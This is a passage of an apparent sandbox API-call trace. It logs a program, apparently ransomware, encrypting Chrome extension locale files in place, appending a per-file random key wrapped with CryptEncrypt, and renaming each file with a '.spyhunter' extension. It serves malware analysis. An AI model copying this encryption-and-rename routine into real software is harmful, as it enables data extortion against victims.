hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.791] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.791] WriteFile (in: hFile=0x180, lpBuffer=0x25cf374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf334, lpOverlapped=0x0 | out: lpBuffer=0x25cf374*, lpNumberOfBytesWritten=0x25cf334*=0x4, lpOverlapped=0x0) returned 1 [0135.792] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf334, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf334*=0x30, lpOverlapped=0x0) returned 1 [0135.792] CloseHandle (hObject=0x180) returned 1 [0135.792] GetProcessHeap () returned 0x2c0000 [0135.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.792] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.spyhunter") returned 167 [0135.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.spyhunter")) returned 1 [0135.793] GetProcessHeap () returned 0x2c0000 [0135.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.793] GetProcessHeap () returned 0x2c0000 [0135.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.793] GetProcessHeap () returned 0x2c0000 [0135.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f815a8 | out: hHeap=0x2c0000) returned 1 [0135.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf370 | out: pbBuffer=0x25cf370) returned 1 [0135.794] GetProcessHeap () returned 0x2c0000 [0135.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf368*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf368*=0x30) returned 1 [0135.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json") returned 157 [0135.795] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.795] GetProcessHeap () returned 0x2c0000 [0135.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.795] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf32c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf32c*=0xb3, lpOverlapped=0x0) returned 1 [0135.796] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.797] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf32c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf32c*=0xb3, lpOverlapped=0x0) returned 1 [0135.797] GetProcessHeap () returned 0x2c0000 [0135.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.797] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.797] WriteFile (in: hFile=0x180, lpBuffer=0x25cf36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf32c, lpOverlapped=0x0 | out: lpBuffer=0x25cf36c*, lpNumberOfBytesWritten=0x25cf32c*=0x4, lpOverlapped=0x0) returned 1 [0135.797] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf32c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf32c*=0x30, lpOverlapped=0x0) returned 1 [0135.797] CloseHandle (hObject=0x180) returned 1 [0135.798] GetProcessHeap () returned 0x2c0000 [0135.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.798] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.spyhunter") returned 167 [0135.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.spyhunter")) returned 1 [0135.799] GetProcessHeap () returned 0x2c0000 [0135.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.799] GetProcessHeap () returned 0x2c0000 [0135.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.799] GetProcessHeap () returned 0x2c0000 [0135.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82060 | out: hHeap=0x2c0000) returned 1 [0135.801] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf368 | out: pbBuffer=0x25cf368) returned 1 [0135.801] GetProcessHeap () returned 0x2c0000 [0135.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.801] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf360*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf360*=0x30) returned 1 [0135.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json") returned 157 [0135.802] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.802] GetProcessHeap () returned 0x2c0000 [0135.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.802] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf324, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf324*=0xb3, lpOverlapped=0x0) returned 1 [0135.803] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.803] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf324, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf324*=0xb3, lpOverlapped=0x0) returned 1 [0135.803] GetProcessHeap () returned 0x2c0000 [0135.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.803] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.804] WriteFile (in: hFile=0x180, lpBuffer=0x25cf364*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf324, lpOverlapped=0x0 | out: lpBuffer=0x25cf364*, lpNumberOfBytesWritten=0x25cf324*=0x4, lpOverlapped=0x0) returned 1 [0135.804] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf324, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf324*=0x30, lpOverlapped=0x0) returned 1 [0135.804] CloseHandle (hObject=0x180) returned 1 [0135.804] GetProcessHeap () returned 0x2c0000 [0135.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.804] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.spyhunter") returned 167 [0135.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0135.805] GetProcessHeap () returned 0x2c0000 [0135.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.805] GetProcessHeap () returned 0x2c0000 [0135.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.805] GetProcessHeap () returned 0x2c0000 [0135.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81298 | out: hHeap=0x2c0000) returned 1 [0135.807] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf360 | out: pbBuffer=0x25cf360) returned 1 [0135.807] GetProcessHeap () returned 0x2c0000 [0135.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.807] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf358*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf358*=0x30) returned 1 [0135.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.807] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json") returned 157 [0135.807] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.808] GetProcessHeap () returned 0x2c0000 [0135.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.808] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf31c*=0xb3, lpOverlapped=0x0) returned 1 [0135.809] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.809] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf31c*=0xb3, lpOverlapped=0x0) returned 1 [0135.809] GetProcessHeap () returned 0x2c0000 [0135.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.809] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.809] WriteFile (in: hFile=0x180, lpBuffer=0x25cf35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x25cf35c*, lpNumberOfBytesWritten=0x25cf31c*=0x4, lpOverlapped=0x0) returned 1 [0135.809] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf31c*=0x30, lpOverlapped=0x0) returned 1 [0135.809] CloseHandle (hObject=0x180) returned 1 [0135.809] GetProcessHeap () returned 0x2c0000 [0135.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.810] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.spyhunter") returned 167 [0135.810] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.spyhunter")) returned 1 [0135.811] GetProcessHeap () returned 0x2c0000 [0135.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.811] GetProcessHeap () returned 0x2c0000 [0135.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.811] GetProcessHeap () returned 0x2c0000 [0135.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81420 | out: hHeap=0x2c0000) returned 1 [0135.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf360 | out: pbBuffer=0x25cf360) returned 1 [0135.811] GetProcessHeap () returned 0x2c0000 [0135.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.811] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf358*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf358*=0x30) returned 1 [0135.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.812] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json") returned 159 [0135.812] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.812] GetProcessHeap () returned 0x2c0000 [0135.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.812] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf31c*=0x111, lpOverlapped=0x0) returned 1 [0135.813] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffeef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.813] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x111, lpNumberOfBytesWritten=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf31c*=0x111, lpOverlapped=0x0) returned 1 [0135.813] GetProcessHeap () returned 0x2c0000 [0135.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.813] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.814] WriteFile (in: hFile=0x180, lpBuffer=0x25cf35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x25cf35c*, lpNumberOfBytesWritten=0x25cf31c*=0x4, lpOverlapped=0x0) returned 1 [0135.814] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf31c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf31c*=0x30, lpOverlapped=0x0) returned 1 [0135.814] CloseHandle (hObject=0x180) returned 1 [0135.814] GetProcessHeap () returned 0x2c0000 [0135.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.814] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.spyhunter") returned 169 [0135.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0135.815] GetProcessHeap () returned 0x2c0000 [0135.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3cd0 | out: hHeap=0x2c0000) returned 1 [0135.815] GetProcessHeap () returned 0x2c0000 [0135.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0135.815] GetProcessHeap () returned 0x2c0000 [0135.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80e00 | out: hHeap=0x2c0000) returned 1 [0135.816] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf358 | out: pbBuffer=0x25cf358) returned 1 [0135.816] GetProcessHeap () returned 0x2c0000 [0135.816] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.816] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf350*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf350*=0x30) returned 1 [0135.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0135.817] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json") returned 156 [0135.817] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0135.817] GetProcessHeap () returned 0x2c0000 [0135.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0135.817] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf314, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf314*=0x117, lpOverlapped=0x0) returned 1 [0135.818] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffee9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.818] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x117, lpNumberOfBytesWritten=0x25cf314, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf314*=0x117, lpOverlapped=0x0) returned 1 [0135.818] GetProcessHeap () returned 0x2c0000 [0135.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0135.818] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.819] WriteFile (in: hFile=0x180, lpBuffer=0x25cf354*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf314, lpOverlapped=0x0 | out: lpBuffer=0x25cf354*, lpNumberOfBytesWritten=0x25cf314*=0x4, lpOverlapped=0x0) returned 1 [0135.819] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf314, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf314*=0x30, lpOverlapped=0x0) returned 1 [0135.819] CloseHandle (hObject=0x180) returned 1 [0135.819] GetProcessHeap () returned 0x2c0000 [0135.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb3cd0 [0135.819] wnsprintfW (in: pszDest=0x2fb3cd0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 